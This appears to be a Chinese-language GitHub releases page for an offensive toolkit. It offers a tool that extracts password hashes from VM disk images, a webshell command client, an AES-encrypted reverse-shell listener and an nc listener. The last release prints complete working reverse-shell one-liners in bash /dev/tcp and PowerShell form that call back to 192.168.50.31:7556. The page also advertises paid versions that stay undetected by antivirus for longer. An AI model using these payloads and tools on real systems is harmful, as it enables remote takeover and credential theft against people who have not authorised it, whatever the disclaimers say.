Skip to content

Releases: 0x7556/hacktool

vmLinuxHash V1.0

Choose a tag to compare

@0x7556 0x7556 released this 10 Aug 13:55
945dcaf

vmLinuxHash — Linux 虚拟机密码Hash提取工具 V2.0

vmLinuxHash 是一款用于离线提取 Linux 虚拟机密码Hash提取的轻量级取证工具。它可直接解析VMDK、RAW/IMG、QCOW2、VDI 四种主流磁盘镜像格式,在不启动虚拟机、无需 root 权限的情况下,离线读取并提取 Linux 系统中的用户凭据Hash信息,适用于红队渗透、取证分析及内部安全审计等场景。

vmLinuxHash 是一款用于离线提取 Linux 虚拟机密码哈希的轻量级工具。它可直接解析 VMware VMDK 虚拟磁盘文件,在不启动虚拟机、无需 root 权限的情况下,离线读取并提取 Linux 系统中的用户凭据哈希信息,适用于红队渗透、取证分析及内部安全审计等场景。

当前Bin文件为V1.0,V2.0在星球下载(用户少免杀时间更久)

WolfShell CMD V1.0

Choose a tag to compare

@0x7556 0x7556 released this 07 Jun 09:51
9cea3b6

全平台WolfShell命令行版

简介

Wshell 是一个用于上传至目标内网,远程连接WolfShell执行命令的工具。它支持多种平台,包括 Windows、ARM、Linux、MIPS、MIPSLE 和 macOS。

用法

Wshell 的用法如下:

wshell.exe <URL> <Password> <Command>
  • <URL>:远程服务器的 URL 地址
  • <Password>:远程服务器的密码
  • <Command>:要在远程服务器上执行的命令

支持的平台

Wshell 提供了多个版本的二进制文件,以支持不同的平台:

  • wshell.exe:Windows 平台(x86)
  • wshell.arm:ARM 平台
  • wshell.lnx:Linux 平台
  • wshell.mips:MIPS 平台
  • wshell.mipsle:MIPSLE 平台
  • wshell_64.mac:macOS 平台(64位)

示例

以下是一些使用 Wshell 的示例:

  • 在 Windows 平台上执行命令:
wshell.exe http://target.com/wolf.aspx WolfShell whoami
  • 在 Linux 平台上执行命令:
./wshell.lnx http://target.com/wolf.aspx WolfShell whoami
  • 在 macOS 平台上执行命令:
./wshell_64.mac http://target.com/wolf.aspx WolfShell whoami

免责声明

  • 使用本工具,请遵循相关法律法规,确保在授权的环境中进行测试和使用。
  • 本工具仅供教育和研究目的,任何滥用行为将由用户自行承担后果。

Wolf NC AES Shell 1.0

Choose a tag to compare

@0x7556 0x7556 released this 02 Jun 15:50
9cea3b6

Wolf AES NC - 加密反弹Shell文档

Wolf AES NC 是一个基于AES加密的反弹Shell工具,采用WolfHash通信密钥认证机制,支持自定义端口和密码。


功能特性

  • AES-256加密通信:所有数据传输均使用AES加密
  • WolfHash密钥认证:基于WolfHash的双向身份验证
  • 灵活配置:支持自定义监听端口和通信密钥
  • 持久监听:服务端支持多客户端连接,自动清理断开连接
  • 命令交互:实时执行远程命令并返回结果

使用方法

基础启动

wolfnc.exe
  • 监听端口:7556(默认)
  • 通信密钥:ca63457538b9b1e0(默认)

自定义端口

wolfnc.exe 8888
  • 监听端口:8888
  • 通信密钥:ca63457538b9b1e0(默认)

自定义端口与密钥

wolfnc.exe 8888 ca63457538b9b342
  • 监听端口:8888
  • 通信密钥:ca63457538b9b342

工作流程

阶段 描述
服务端初始化 在指定端口(默认7556)启动监听
客户端连接 客户端连接后,显示连接信息(IP:端口)
命令交互 CMD >提示符后输入命令,实时执行并返回结果
会话终止 输入exit或客户端断开连接后,进行清理操作
恢复监听 自动返回监听状态,等待下一个客户端连接

连接示例

>wolfnc.exe 8888 ca63457538b9b342
WolfShell AES NC 1.0
Listening on port: 8888
Client connected: 192.168.50.31:65181

CMD > net user
\\WIN7 的用户帐户
[返回用户列表结果]

CMD > ipconfig
[返回网络配置结果]

CMD > exit
Connection closed.
Listening on port: 8888

密钥管理

安全建议

  • 定期更换通信密钥,避免使用默认密钥
  • 在生产环境中使用强随机密钥
  • 密钥仅在授权用户之间传递

故障排除

问题 原因 解决方案
端口被占用 指定端口已被其他进程使用 更换端口:wolfnc.exe [新端口]
连接失败 密钥不匹配 确认客户端和服务端密钥一致
命令无响应 网络连接中断 检查网络连接,重新连接

免责声明

  • 使用本工具,请遵循相关法律法规,确保在授权的环境中进行测试和使用。
  • 本工具仅供教育和研究目的,任何滥用行为将由用户自行承担后果。

全平台NC反弹Shell监听器 20260607

Choose a tag to compare

@0x7556 0x7556 released this 02 Jun 15:42
9cea3b6

VPS正常NC监听

默认监听端口

直接运行 7556端口

Win VPS监听指定端口

nc.exe 4444

Linux VPS监听指定端口

./nc.lnx 4444

监听指定端口

nc.exe 4444
./nc.lnx 4444

被控端反弹Shell

Linux反弹shell

bash -i >& /dev/tcp/192.168.50.31/7556 0>&1

Windows反弹shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.50.31',7556);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

免责声明

  • 使用本工具,请遵循相关法律法规,确保在授权的环境中进行测试和使用。
  • 本工具仅供教育和研究目的,任何滥用行为将由用户自行承担后果。